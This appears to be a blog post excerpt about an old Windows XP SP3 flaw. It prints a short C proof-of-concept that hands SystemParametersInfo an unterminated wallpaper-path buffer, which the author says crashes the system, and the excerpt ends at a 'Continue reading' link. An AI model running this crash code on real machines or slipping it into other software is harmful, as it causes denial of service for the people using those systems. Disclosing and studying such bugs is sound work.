Oh No, My XPSP3

#include <windows.h> int main() {  WCHAR c[1000] = {0};  memset(c, ‘c’, 1000);  SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0); WCHAR b[1000] = {0};  SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);  return 0; } Two posts ago I talked about vulnerabilities. So here’s some Zero Day. This will crash your system, unless you’re on Vista (which is already immune to it). And … Continue reading Oh No, My XPSP3